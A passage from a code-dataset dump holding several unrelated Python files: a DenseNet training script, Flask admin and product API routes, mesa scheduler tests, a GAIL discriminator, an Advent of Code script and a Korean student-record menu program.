lons.append(coord.az.value - az_offset)\n\n ax.scatter(lons, lats,\n color=colors[i], marker='o', transform=ccrs.Geodetic())\n","repo_name":"PolarMesosphericClouds/SkyWinder-Analysis","sub_path":"skywinder_analysis/lib/pointing/plotting_pointing_solutions.py","file_name":"plotting_pointing_solutions.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45623104174","text":"# coding=utf-8\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport densenet as DenseNet\nimport input_data\n\nBATCH_SIZE = 128\nHEIGHT = input_data.HEIGHT\nWIDTH = input_data.WIDTH\nCHANNELS = 3\nCLASSES = DenseNet.CLASSES\n\n\nKEEP_PROB = 0.8\n#MAX_STEPS = 44000\n#initial_lr = 0.002\nMAX_STEPS = 80000\ninitial_lr = 0.1\n\nsaved_ckpt_path = './checkpoint/'\nsaved_summary_train_path = './summary/train/'\nsaved_summary_test_path = './summary/test/'\n\nwith tf.name_scope('input'):\n x = tf.placeholder(dtype=tf.float32, shape=[None, HEIGHT, WIDTH, CHANNELS], name='x_input')\n y = tf.placeholder(dtype=tf.int32, shape=[None], name='label')\n keep_prob = tf.placeholder(dtype=tf.float32, name='keep_prob')\n y_onehot = tf.one_hot(y, CLASSES, dtype=tf.float32)\n\nlogits = DenseNet.densenet_cifar(x, keep_prob, True)\n\nwith tf.name_scope(\"loss\"):\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_onehot, logits=logits, name='loss'))\n tf.summary.scalar('loss', loss)\n\n\nwith tf.name_scope('learning_rate'):\n lr = tf.Variable(initial_lr, dtype=tf.float32)\n tf.summary.scalar('learning_rate', lr)\n\n#optimizer = tf.train.AdamOptimizer(lr).minimize(loss)\noptimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.9).minimize(loss)\n\nwith tf.name_scope('accuracy'):\n softmax = tf.nn.softmax(logits, axis=-1)\n correct_prediction = tf.equal(tf.argmax(y_onehot, 1), tf.argmax(softmax, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('accuracy', accuracy)\n\nmerged = tf.summary.merge_all()\n\ntrain_data = input_data.read_train_data()\ntest_data = input_data.read_test_data()\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n\n # if os.path.exists(saved_ckpt_path):\n ckpt = tf.train.get_checkpoint_state(saved_ckpt_path)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(\"Model restored...\")\n\n # saver.restore(sess, './checkpoint/densenet.model-30000')\n\n train_summary_writer = tf.summary.FileWriter(saved_summary_train_path, sess.graph)\n test_summary_writer = tf.summary.FileWriter(saved_summary_test_path, sess.graph)\n\n\n for i in range(0, MAX_STEPS + 1):\n train_img_data, train_lables = train_data.next_batch(BATCH_SIZE, 'train')\n test_img_data, test_labels = test_data.next_batch(BATCH_SIZE)\n\n train_summary, _ = sess.run([merged, optimizer], feed_dict={x: train_img_data, y: train_lables, keep_prob: KEEP_PROB})\n train_summary_writer.add_summary(train_summary, i)\n test_summary = sess.run(merged, feed_dict={x: test_img_data, y: test_labels, keep_prob: 1.0})\n test_summary_writer.add_summary(test_summary, i)\n\n\n train_accuracy, train_loss_val = sess.run([accuracy, loss], feed_dict={x: train_img_data, y: train_lables,\n keep_prob: 1.0})\n test_accuracy, test_loss_val = sess.run([accuracy, loss], feed_dict={x: test_img_data, y: test_labels,\n keep_prob: 1.0})\n\n if i % 
10 == 0:\n learning_rate = sess.run(lr)\n print(\n \"train step: %d, learning rate: %f, train loss: %f, train accuracy: %f, test loss: %f, test accuracy: %f\" % (\n i, learning_rate, train_loss_val, train_accuracy, test_loss_val,\n test_accuracy))\n\n if i % 10000 == 0:\n saver.save(sess, os.path.join(saved_ckpt_path, 'densenet.model'), global_step=i)\n\n if i == 40000 or i == 60000:\n sess.run(tf.assign(lr, 0.1 * lr))\n","repo_name":"zhulf0804/DenseNet-Tensorflow","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41618458135","text":"from flask import Blueprint, request, g, jsonify\nfrom flask import redirect, current_app\nfrom flask import render_template\nfrom flask import session\nfrom datetime import datetime\nimport time,random\nfrom utils.qcloud_cos import qlcoud_cos\n\nfrom models import UserInfo, NewsInfo, NewsCategory, db\n\nadmin_blueprint = Blueprint('admin', __name__, url_prefix='/admin')\n\n\n@admin_blueprint.route('/m/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'GET':\n return render_template('admin/login.html')\n # post请求,查询数据\n name = request.form.get('username')\n pwd = request.form.get('password')\n\n if not all([name, pwd]):\n return render_template('admin/login.html', msg='请填写用户名、密码')\n\n user = UserInfo.query.filter_by(mobile=name, isAdmin=True).first()\n if user:\n if user.check_pwd(pwd):\n # 登录成功\n session['admin_id'] = user.id\n return redirect('/admin/m')\n else:\n return render_template('admin/login.html', msg='密码错误')\n else:\n return render_template('admin/login.html', msg='用户名错误')\n\n\n# @app.before_request\n@admin_blueprint.before_request\ndef login_valid():\n # 当大部分视图都执行一段代码时,则将这段代码封装到请求勾子函数中\n # 排除小部分视图\n ignore_list = ['/admin/m/login', ]\n if request.path not in ignore_list:\n if 'admin_id' not in session:\n return redirect('/admin/m/login')\n g.user = UserInfo.query.get(session.get('admin_id'))\n\n\n@admin_blueprint.route('/m')\ndef index():\n return render_template('admin/index.html')\n\n\n@admin_blueprint.route('/logout')\ndef logout():\n del session['admin_id']\n return redirect('/admin/m/login')\n\n\n# 用户统计\n@admin_blueprint.route('/usercount')\ndef usercount():\n # 用户总数\n total_count = UserInfo.query.filter_by(isAdmin=False).count()\n\n now = datetime.now()\n\n # 用户月新增数:本月注册的用户数量\n month_first = datetime(now.year, now.month, 1)\n month_count = UserInfo.query. \\\n filter_by(isAdmin=False). \\\n filter(UserInfo.create_time >= month_first). \\\n count()\n\n # 用户日新增数:今天注册的用户数量\n day_first = datetime(now.year, now.month, now.day)\n day_count = UserInfo.query. \\\n filter_by(isAdmin=False). \\\n filter(UserInfo.create_time >= day_first). 
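# The DenseNet training loop above multiplies the learning rate by 0.1 at
# steps 40000 and 60000; the same piecewise schedule written as a pure
# function for clarity (the function name is illustrative, the boundaries
# come from the loop).
def lr_at_step(step, initial_lr=0.1):
    if step >= 60000:
        return initial_lr * 0.01
    if step >= 40000:
        return initial_lr * 0.1
    return initial_lr

print(lr_at_step(0), lr_at_step(45000), lr_at_step(70000))  # 0.1, ~0.01, ~0.001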
\\\n count()\n\n # 用户登录活跃数\n key = 'login' + now.strftime('%Y%m%d')\n redis_cli = current_app.redis_cli\n times = redis_cli.hkeys(key)\n counts = redis_cli.hvals(key)\n # 从redis中读取出来的数据,是bytes类型\n # print(times)[b'08:00', b'09:00', b'10:00'。。。]\n # print(counts)[b'356', b'410', b'284',。。。]\n\n # 将bytes转换成str 字符串.encode() 字节.decode()\n times = [item.decode() for item in times]\n # print(times)\n # 将bytes转换成int\n counts = [int(item) for item in counts]\n # print(counts)\n\n return render_template(\n 'admin/user_count.html',\n total_count=total_count,\n month_count=month_count,\n day_count=day_count,\n times=times,\n counts=counts\n )\n\n\n# 新闻审核列表\n@admin_blueprint.route('/news_review')\ndef news_review1():\n return render_template('admin/news_review.html')\n\n\n# 新闻审核列表数据\n@admin_blueprint.route('/news_review2')\ndef news_review2():\n # 搜索关键字\n title = request.args.get('title')\n # 页码\n page = int(request.args.get('page', 1))\n\n type = int(request.args.get('type', 1))\n\n # 拼接查询语句\n query = NewsInfo.query\n if title:\n # 查询新闻标题包括指定字符串的数据\n query = query.filter(NewsInfo.title.contains(title))\n if type==2:\n pagination = query.order_by(NewsInfo.status.asc(), NewsInfo.id.desc()).paginate(page, 10, False)\n else:\n pagination = query.order_by(NewsInfo.id.desc()).filter_by(status=2).paginate(page, 10, False)\n # 获取当前页的数据\n news_list = pagination.items\n # 获取总页数\n total_page = pagination.pages\n\n # 最终返回json数据,需要将news_list转成字典\n news_list2 = []\n for news in news_list:\n news_list2.append({\n 'id': news.id,\n 'title': news.title,\n 'create_time': news.create_time.strftime('%Y-%m-%d %H:%M:%S'),\n 'status': news.status\n })\n\n return jsonify(news_list=news_list2, total_page=total_page)\n\n\n@admin_blueprint.route('/type_list')\ndef type_list():\n return render_template('admin/news_type.html')\n\n\n@admin_blueprint.route('/type_list_json')\ndef type_list_json():\n # 查询\n category_list = NewsCategory.query.all()\n\n # 对象转字典\n category_list2 = []\n for category in category_list:\n category_list2.append({\n 'id': category.id,\n 'name': category.name\n })\n\n # 返回json\n return jsonify(category_list=category_list2)\n\n\n@admin_blueprint.route('/type_add', methods=['POST'])\ndef type_add():\n # 接收\n name = request.form.get('name')\n\n # 验证\n # 1.非空\n if not name:\n return jsonify(result=1)\n # 2.是否存在此名称\n if NewsCategory.query.filter_by(name=name).count() > 0:\n return jsonify(result=2)\n\n # 处理:添加\n category = NewsCategory()\n category.name = name\n db.session.add(category)\n db.session.commit()\n\n # 响应\n return jsonify(result=3)\n\n\n@admin_blueprint.route('/type_edit/', methods=['POST'])\ndef type_edit(category_id):\n # 参数:主键,name\n name = request.form.get('name')\n\n # 验证\n if not name:\n return jsonify(result=1)\n # 是否重复:如果未修改则提示请修改,如果修改为重复别称,则提示重复\n category = NewsCategory.query.get(category_id)\n # 未修改直接提交\n if category.name == name:\n return jsonify(result=2)\n # 修改后,如果名称重复,则返回\n if NewsCategory.query.filter_by(name=name).count() > 0:\n return jsonify(result=3)\n\n # 处理:修改\n category.name = name\n db.session.commit()\n\n # 响应\n return jsonify(result=4)\n\n\n# 用户列表\n@admin_blueprint.route('/user_list')\ndef user_list():\n page = int(request.args.get('page', 1))\n users = UserInfo.query.filter_by(isAdmin=False).paginate(page, 10, False)\n users_list = users.items\n users_list_pages = users.pages\n return render_template('admin/user_list.html', page=page, users_list=users_list, users_list_pages=users_list_pages)\n\n\n# 新闻编辑\n@admin_blueprint.route('/news_edit')\ndef news_edit():\n return 
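# The usercount view above reads hourly login counts from a Redis hash named
# 'login' + YYYYMMDD; a sketch of the write side that would populate that
# hash at login time. The key layout is inferred from the read code;
# hincrby is the standard redis-py increment call.
from datetime import datetime
import redis

def record_login(redis_cli):
    now = datetime.now()
    key = 'login' + now.strftime('%Y%m%d')
    redis_cli.hincrby(key, now.strftime('%H:00'), 1)

# record_login(redis.Redis())  # one call per successful login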
render_template('admin/news_edit.html')\n\n# 新闻编辑页面\n@admin_blueprint.route('/news_edit/', methods=['GET', 'POST'])\ndef news_edit_detail(news_id):\n if request.method == 'GET':\n news = NewsInfo.query.get(news_id)\n category = NewsCategory.query.all()\n return render_template('admin/news_edit_detail.html', news=news,category=category)\n\n title = request.form.get('title')\n category = request.form.get('category')\n summary = request.form.get('summary')\n content = request.form.get('content')\n pic = request.files.get('pic')\n news = NewsInfo.query.get(news_id)\n if pic:\n # 将图片上传到腾讯云\n nowTime = lambda: int(round(time.time() * 1000))\n file_name = str(random.random()) + str(nowTime()) + pic.filename\n qlcoud_cos.upload_img(pic, file_name)\n news.pic = file_name;\n\n news.title = title\n news.category_id = category\n news.summary = summary\n news.context = content\n db.session.commit()\n return redirect('/admin/news_edit')\n\n# 新闻审核\n@admin_blueprint.route('/news_review_detail/', methods=['GET', 'POST'])\ndef news_review_detail(news_id):\n if request.method == 'GET':\n news = NewsInfo.query.get(news_id)\n category = NewsCategory.query.get(news.category_id)\n return render_template('admin/news_review_detail.html', news=news,category=category)\n # 更新数据\n action = int(request.form.get('action',2))\n reason = request.form.get('reason','reason')\n news = NewsInfo.query.get(news_id)\n # 用户文章数+1\n user = UserInfo.query.get(news.user_id)\n if action == 2:\n user.public_count += 1\n else:\n if news.status == 2:\n user.public_count -= 1\n # 新闻更新\n news.status = action\n news.reason = reason\n\n # 向数据库添加数据\n db.session.commit()\n\n return redirect('/admin/news_review')\n","repo_name":"k2tv/news","sub_path":"view_admin.py","file_name":"view_admin.py","file_ext":"py","file_size_in_byte":8649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16566219019","text":"\"\"\"\nTest the advanced schedulers.\n\"\"\"\n\nimport unittest\nfrom unittest import TestCase, mock\nfrom mesa import Model, Agent\nfrom mesa.time import (\n BaseScheduler,\n StagedActivation,\n RandomActivation,\n SimultaneousActivation,\n)\n\nRANDOM = \"random\"\nSTAGED = \"staged\"\nSIMULTANEOUS = \"simultaneous\"\n\n\nclass MockAgent(Agent):\n \"\"\"\n Minimalistic agent for testing purposes.\n \"\"\"\n\n def __init__(self, unique_id, model):\n super().__init__(unique_id, model)\n self.steps = 0\n self.advances = 0\n\n def stage_one(self):\n self.model.log.append(self.unique_id + \"_1\")\n\n def stage_two(self):\n self.model.log.append(self.unique_id + \"_2\")\n\n def advance(self):\n self.advances += 1\n\n def step(self):\n self.steps += 1\n\n\nclass MockModel(Model):\n def __init__(self, shuffle=False, activation=STAGED):\n \"\"\"\n Creates a Model instance with a schedule\n\n Args:\n shuffle (Bool): whether or not to instantiate a scheduler\n with shuffling.\n This option is only used for\n StagedActivation schedulers.\n\n activation (str): which kind of scheduler to use.\n 'random' creates a RandomActivation scheduler.\n 'staged' creates a StagedActivation scheduler.\n The default scheduler is a BaseScheduler.\n \"\"\"\n self.log = []\n\n # Make scheduler\n if activation == STAGED:\n model_stages = [\"stage_one\", \"stage_two\"]\n self.schedule = StagedActivation(self, model_stages, shuffle=shuffle)\n elif activation == RANDOM:\n self.schedule = RandomActivation(self)\n elif activation == SIMULTANEOUS:\n self.schedule = SimultaneousActivation(self)\n else:\n self.schedule = 
BaseScheduler(self)\n\n # Make agents\n for name in [\"A\", \"B\"]:\n agent = MockAgent(name, self)\n self.schedule.add(agent)\n\n def step(self):\n self.schedule.step()\n\n\nclass TestStagedActivation(TestCase):\n \"\"\"\n Test the staged activation.\n \"\"\"\n\n expected_output = [\"A_1\", \"B_1\", \"A_2\", \"B_2\"]\n\n def test_no_shuffle(self):\n \"\"\"\n Testing staged activation without shuffling.\n \"\"\"\n model = MockModel(shuffle=False)\n model.step()\n model.step()\n assert all([i == j for i, j in zip(model.log[:4], model.log[4:])])\n\n def test_shuffle(self):\n \"\"\"\n Test staged activation with shuffling\n \"\"\"\n model = MockModel(shuffle=True)\n model.step()\n for output in self.expected_output[:2]:\n assert output in model.log[:2]\n for output in self.expected_output[2:]:\n assert output in model.log[2:]\n\n def test_shuffle_shuffles_agents(self):\n model = MockModel(shuffle=True)\n model.random = mock.Mock()\n assert model.random.shuffle.call_count == 0\n model.step()\n assert model.random.shuffle.call_count == 1\n\n def test_remove(self):\n \"\"\"\n Test staged activation can remove an agent\n \"\"\"\n model = MockModel(shuffle=True)\n agent_keys = list(model.schedule._agents.keys())\n agent = model.schedule._agents[agent_keys[0]]\n model.schedule.remove(agent)\n assert agent not in model.schedule.agents\n\n def test_add_existing_agent(self):\n model = MockModel()\n agent = model.schedule.agents[0]\n with self.assertRaises(Exception):\n model.schedule.add(agent)\n\n\nclass TestRandomActivation(TestCase):\n \"\"\"\n Test the random activation.\n \"\"\"\n\n def test_random_activation_step_shuffles(self):\n \"\"\"\n Test the random activation step\n \"\"\"\n model = MockModel(activation=RANDOM)\n model.random = mock.Mock()\n model.schedule.step()\n assert model.random.shuffle.call_count == 1\n\n def test_random_activation_step_increments_step_and_time_counts(self):\n \"\"\"\n Test the random activation step increments step and time counts\n \"\"\"\n model = MockModel(activation=RANDOM)\n assert model.schedule.steps == 0\n assert model.schedule.time == 0\n model.schedule.step()\n assert model.schedule.steps == 1\n assert model.schedule.time == 1\n\n def test_random_activation_step_steps_each_agent(self):\n \"\"\"\n Test the random activation step causes each agent to step\n \"\"\"\n\n model = MockModel(activation=RANDOM)\n model.step()\n agent_steps = [i.steps for i in model.schedule.agents]\n # one step for each of 2 agents\n assert all(map(lambda x: x == 1, agent_steps))\n\n\nclass TestSimultaneousActivation(TestCase):\n \"\"\"\n Test the simultaneous activation.\n \"\"\"\n\n def test_simultaneous_activation_step_steps_and_advances_each_agent(self):\n \"\"\"\n Test the simultaneous activation step causes each agent to step\n \"\"\"\n model = MockModel(activation=SIMULTANEOUS)\n model.step()\n # one step for each of 2 agents\n agent_steps = [i.steps for i in model.schedule.agents]\n agent_advances = [i.advances for i in model.schedule.agents]\n assert all(map(lambda x: x == 1, agent_steps))\n assert all(map(lambda x: x == 1, agent_advances))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"tpike3/SugarScape","sub_path":"venv/Lib/site-packages/tests/test_time.py","file_name":"test_time.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"6572401073","text":"from flask import Blueprint, request, jsonify\n\nfrom server.models import Product\nfrom server 
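# Quick interactive sanity run of the fixtures above (not part of the test
# suite): a staged model without shuffling logs stage one for both agents
# before stage two, matching expected_output.
demo = MockModel(shuffle=False)
demo.step()
print(demo.log)  # ['A_1', 'B_1', 'A_2', 'B_2']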
import db\n\nmarket = Blueprint('market', __name__)\n\n@market.route('/api/product/add', methods=['POST'])\ndef add_product():\n    try:\n        name = request.json.get('name')\n        description = request.json.get('description')\n        price = request.json.get('price')\n        db.session.add(Product(name=name, desc=description, price=price))\n        db.session.commit()\n    except: \n        return jsonify(result={\n            'message': 'Produkt nie został dodany do bazy, spróbuj później.',\n            'category': 'danger'\n        })\n    return jsonify(result={\n        'message': 'Produkt został pomyślnie dodany.',\n        'category': 'success'\n    })\n    \n@market.route('/api/product/del/<int:product_id>')\ndef remove_product(product_id):\n    product = Product.query.filter_by(id=product_id).first_or_404()\n    db.session.delete(product)  # remove the row and persist the change\n    db.session.commit()\n    return jsonify(result={\n        'message': 'Produkt został usunięty',\n        'category': 'info'\n    })\n\n@market.route('/api/product/update/<int:product_id>', methods=['POST'])\ndef update_product(product_id):\n    allowed_fields = ('name', 'desc', 'price')\n    product = Product.query.filter_by(id=product_id).first_or_404()\n\n    for field in allowed_fields:\n        fieldValue = request.json.get(field)\n\n        if fieldValue is not None:\n            setattr(product, field, fieldValue)\n    db.session.commit()\n\n    return jsonify(result={\n        'message': 'Produkt został zaaktualizowany',\n        'category': 'success'\n    })\n\n@market.route('/api/products', methods=['GET'])\ndef products():\n    products = Product.query.all()\n    data = []\n    for product in products:\n        data.append(dict(product={\n            'id': product.id,\n            'name': product.name,\n            'price': product.price,\n            'description': product.desc,\n            'add_date': product.add_date.strftime(\"%Y/%m/%d, %H:%M:%S\"),\n        }))\n    return jsonify(result=data)\n\n","repo_name":"coding-tree/flask-react","sub_path":"server/market/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"12614627920","text":"import tensorflow as tf\nimport numpy as np\nimport gym\nfrom gym.spaces import Box, Discrete\nimport pandas as pd\n\n\"\"\"\nTo make this program\nI referred to https://github.com/uidilr/gail_ppo_tf/blob/master/network_models/discriminator.py\n\"\"\"\n\ndef logsigmoid(a):\n    '''Equivalent to tf.log(tf.sigmoid(a))'''\n    return -tf.nn.softplus(-a)\n\n\"\"\" Reference: https://github.com/openai/imitation/blob/99fbccf3e060b6e6c739bdf209758620fcdefd3c/policyopt/thutil.py#L48-L51\"\"\"\n\ndef logit_bernoulli_entropy(logits):\n    ent = (1.-tf.nn.sigmoid(logits))*logits - logsigmoid(logits)\n    return ent\n\n####### from core, for envs of any dimension\ndef combined_shape(length, shape=None):# e.g. when act is 1-D, action_space.shape == () (an empty tuple), so handle that case\n    if shape is None:\n        return (length,)\n    elif shape == ():\n        return (length,1)#! make it (None, 1), adding a feature dim\n    return (length, shape) if np.isscalar(shape) else (length, *shape)\n\ndef placeholder(dim=None):\n    return tf.placeholder(dtype=tf.float32, shape=combined_shape(None,dim))\n'''\ndef placeholder_from_space(space):\n    if isinstance(space, Box):# if continuous values...\n        return placeholder(space.shape)\n    elif isinstance(space, Discrete):\n        return tf.placeholder(dtype=tf.float32, shape=(None,))# if discrete, 1-D?? 
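# Hedged client-side sketch for the product endpoints above; host/port and
# the sample payload are assumptions, and the update route is POST as
# declared in the blueprint.
import requests

base = 'http://localhost:5000'
print(requests.post(base + '/api/product/add',
                    json={'name': 'Chair', 'description': 'Oak', 'price': 120}).json())
print(requests.get(base + '/api/products').json())
print(requests.post(base + '/api/product/update/1', json={'price': 99}).json())
print(requests.get(base + '/api/product/del/1').json())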
#!debugのためint → floatに変更\n raise NotImplementedError\n'''\n##########\n\ndef proper_shape(arr):#!input numpyarray\n if arr.ndim==1:\n return np.reshape(arr,(arr.shape[0],1))\n return arr\n\n\n\nclass Discriminator():\n def __init__(self,env, hidden_size, entcoeff=0.001, lr_rate=1e-3, scope=\"adversary\", reward_type='negative'):\n \n with tf.variable_scope(scope):\n self.scope = scope\n self.observation_shape = env.observation_space.shape\n self.actions_shape = env.action_space.shape\n self.hidden_size = hidden_size\n self.build_ph()\n\n \n\n # Build grpah\n with tf.variable_scope('network') as network_scope:\n generator_logits = self.build_graph(self.generator_obs_ph, self.generator_acs_ph, reuse=False)#generatorはAgentの行動である確率\n expert_logits = self.build_graph(self.expert_obs_ph, self.expert_acs_ph, reuse=True)#generatorのグラフをコピー\n # Build accuracy\n with tf.variable_scope('loss'):\n generator_acc = tf.reduce_mean(tf.to_float(tf.nn.sigmoid(generator_logits) < 0.5))#agentの行動がEXPERTである確率(Dの判断)が0.5以下なら1、それ以上なら0(正解)としてDの正解率を計算\n expert_acc = tf.reduce_mean(tf.to_float(tf.nn.sigmoid(expert_logits) > 0.5))\n # Build regression loss\n # let x = logits, z = targets.\n # z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))\n generator_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=generator_logits, labels=tf.zeros_like(generator_logits))#labelはすべて0(全て間違い)\n generator_loss = tf.reduce_mean(generator_loss)\n expert_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=expert_logits, labels=tf.ones_like(expert_logits))#すべて正解\n expert_loss = tf.reduce_mean(expert_loss)\n # Build entropy loss\n logits = tf.concat([generator_logits, expert_logits], 0)\n entropy = tf.reduce_mean(logit_bernoulli_entropy(logits))\n entropy_loss = -entcoeff*entropy#エントロピー項をentcoeff倍(影響を調節)\n # Loss + Accuracy terms\n self.losses = [generator_loss, expert_loss, entropy, entropy_loss, generator_acc, expert_acc]\n self.loss_name = [\"generator_loss\", \"expert_loss\", \"entropy\", \"entropy_loss\", \"generator_acc\", \"expert_acc\"]\n self.total_loss = generator_loss + expert_loss + entropy_loss\n \n optimizer = tf.train.AdamOptimizer()\n self.train_op = optimizer.minimize(self.total_loss)\n \n # Build Reward for policy\n #self.reward_op = -tf.log(1-tf.nn.sigmoid(generator_logits)+1e-8)#つねに正の報酬\n log_d_g= tf.reduce_mean(tf.log(1-tf.nn.sigmoid(generator_logits)+1e-8))\n log_1_d_e= tf.reduce_mean(tf.log(tf.nn.sigmoid(expert_logits)+1e-8))\n self.js_div = (log_d_g + log_1_d_e)/2.0+ tf.log(2.0)\n #self.js_div = tf.clip_by_value(self.js_div,1e-8,1.0)#!dontclip\n self.reward_op_negat = tf.log(tf.nn.sigmoid(generator_logits)+1e-8)\n self.reward_op_posit = -tf.log(1-tf.nn.sigmoid(generator_logits)+1e-8)\n self.reward_op_airl = self.reward_op_negat+ self.reward_op_posit\n\n reward_type_dict = {'negative':self.reward_op_negat, 'positive':self.reward_op_posit,'airl':self.reward_op_airl }\n assert reward_type in reward_type_dict,'reward_type is not in type_dict'\n \n self.reward_op = reward_type_dict[reward_type]\n \n \n def train(self,session,e_obs_buf,e_act_buf,a_obs_buf, a_act_buf):\n return session.run(self.train_op, feed_dict={self.generator_obs_ph:proper_shape(a_obs_buf),\n self.generator_acs_ph:proper_shape(a_act_buf),\n self.expert_obs_ph:proper_shape(e_obs_buf),\n self.expert_acs_ph:proper_shape(e_act_buf)})\n \n def get_js_div(self,session,e_obs_buf,e_act_buf,a_obs_buf, a_act_buf):\n return session.run(self.js_div, feed_dict={self.generator_obs_ph:proper_shape(a_obs_buf),\n 
self.generator_acs_ph:proper_shape(a_act_buf),\n self.expert_obs_ph:proper_shape(e_obs_buf),\n self.expert_acs_ph:proper_shape(e_act_buf)})\n \n \n\n def get_reward_buf(self,session, a_obs_buf, a_act_buf):#get_reward\n return session.run(self.reward_op_negat, feed_dict={self.generator_obs_ph: proper_shape(a_obs_buf),\n self.generator_acs_ph: proper_shape(a_act_buf)})\n\n def get_positive_reward_buf(self,session, a_obs_buf, a_act_buf):#get_reward\n return session.run(self.reward_op_posit, feed_dict={self.generator_obs_ph: proper_shape(a_obs_buf),\n self.generator_acs_ph: proper_shape(a_act_buf)})\n\n def get_airl_reward_buf(self,session, a_obs_buf, a_act_buf):#get_reward\n return session.run(self.reward_op_airl, feed_dict={self.generator_obs_ph: proper_shape(a_obs_buf),\n self.generator_acs_ph: proper_shape(a_act_buf)})\n\n def get_reward(self,session, a_obs_buf, a_act_buf):\n return session.run(self.reward_op, feed_dict={self.generator_obs_ph: proper_shape(a_obs_buf),\n self.generator_acs_ph: proper_shape(a_act_buf)})\n \n\n def build_ph(self):#make placeholder shape(None,obs.shape)\n self.generator_obs_ph = tf.placeholder(tf.float32, combined_shape(None,self.observation_shape), name=\"observations_ph\")\n self.generator_acs_ph = tf.placeholder(tf.float32, combined_shape(None,self.actions_shape), name=\"actions_ph\")\n self.expert_obs_ph = tf.placeholder(tf.float32, combined_shape(None,self.observation_shape), name=\"expert_observations_ph\")\n self.expert_acs_ph = tf.placeholder(tf.float32, combined_shape(None,self.actions_shape), name=\"expert_actions_ph\")\n\n\n def build_graph(self, obs_ph, acs_ph, reuse=False):#2層のtanhと全結合層\n with tf.variable_scope(self.scope):\n if reuse:\n tf.get_variable_scope().reuse_variables()\n \n obs = obs_ph#!とりあえず標準化なし\n _input = tf.concat([obs, acs_ph], axis=1) # concatenate the two input -> form a transition\n p_h1 = tf.contrib.layers.fully_connected(_input, self.hidden_size, activation_fn=tf.nn.tanh)\n p_h2 = tf.contrib.layers.fully_connected(p_h1, self.hidden_size, activation_fn=tf.nn.tanh)\n logits = tf.contrib.layers.fully_connected(p_h2, 1, activation_fn=tf.identity)\n return logits#確率\n \n def proper_shape(arr):#!input numpyarray\n if arr.ndim==1:\n return np.reshape(arr,(arr.shape[0],1))\n return arr\n","repo_name":"KtechB/spinningup_gail_extension-","sub_path":"discriminator_js.py","file_name":"discriminator_js.py","file_ext":"py","file_size_in_byte":8781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38575731836","text":"import time\n\nwith open('input.txt','r') as f:\n\tlistl=[]\n\tfor line in f:\n\t\tstrip_lines=line.strip()\n\t\tm=listl.append(strip_lines)\n\ncounter = 0\nfor i in range(len(listl)):\n if( i == 0):\n continue\n elif(listl[i] > listl[i-1]):\n print(\"Increased\")\n counter += 1\n else:\n print(\"Decreased\")\n\nprint(\"Vyslo nam zde {}\".format(counter))","repo_name":"donicjak/advent_of_code","sub_path":"01/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9260582521","text":"import json\nwhile True:\n try:\n with open('ITT_Student.json', 'r', encoding='utf8') as json_file:\n json_object = json.load(json_file)\n json_string = json.dumps(json_object)\n g_json_big_data = json.loads(json_string)\n except FileNotFoundError:\n print(\"json파일이 존재하지 않습니다.\")\n print(\"1. json파일이 존재하는 경로를 지정한다.\")\n print(\"2. 
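# Numeric illustration of the three reward shapes defined in the
# Discriminator above: for a logit x with D = sigmoid(x), 'negative' is
# log(D) <= 0, 'positive' is -log(1 - D) >= 0, and 'airl' is their sum,
# which equals the logit itself (up to the 1e-8 clamps in the graph).
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

for x in (-2.0, 0.0, 2.0):
    d = sigmoid(x)
    print(x, np.log(d), -np.log(1.0 - d), np.log(d) - np.log(1.0 - d))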
json파일을 신규 생성한다.\")\n file_choice = input(\"어떻게 하시겠습니까?: \")\n if file_choice == \"1\":\n pass\n elif file_choice == \"2\":\n pass\n #file_choice가 1이거나 오류가 나지 않으면 학생 정보조회, 정보수정, 정보삭제를 수행한다. #file_choice가 2면 2,3,4에 없다고 띄운다. #선택지 1과 4의 경우에는 끝나고 파일을 저장하고 다시 처음부터 시작하게 한다.\n while True:\n print(\"1.학생 정보입력\")\n print(\"2.학생 정보조회\")\n print(\"3.학생 정보수정\")\n print(\"4.학생 정보삭제\")\n print(\"5.프로그램 종료\")\n menu_choice = input(\"메뉴를 선택하세요: \")\n if menu_choice ==\"1\": #학생 정보 입력\n if file_choice == \"2\":\n new_name = input(\"이름 (예:홍길동): \")\n new_age = input(\"나이 (예:29): \")\n new_post = input(\"주소 (예: 대구광역시 동구 아양로 135): \")\n lecture_took_time = input(\"과거 수강 횟수(예:1): \")\n lecture_current_pf = input(\"현재 수강 과목이 있습니까? (예:y/n): \")\n if lecture_current_pf == \"n\":\n break\n elif lecture_current_pf ==\"y\":\n new_lecture_code = input(\"강의코드 (예:IB171106,OB0104..): \")\n new_lecuture_name = input(\"강의명 (예:IOT 빅데이터 실무반): \")\n new_instructor = input(\"강사 (예:이현구): \")\n new_open_date = input(\"개강일 (예:2017-11-06): \")\n new_close_date = input(\"종료일 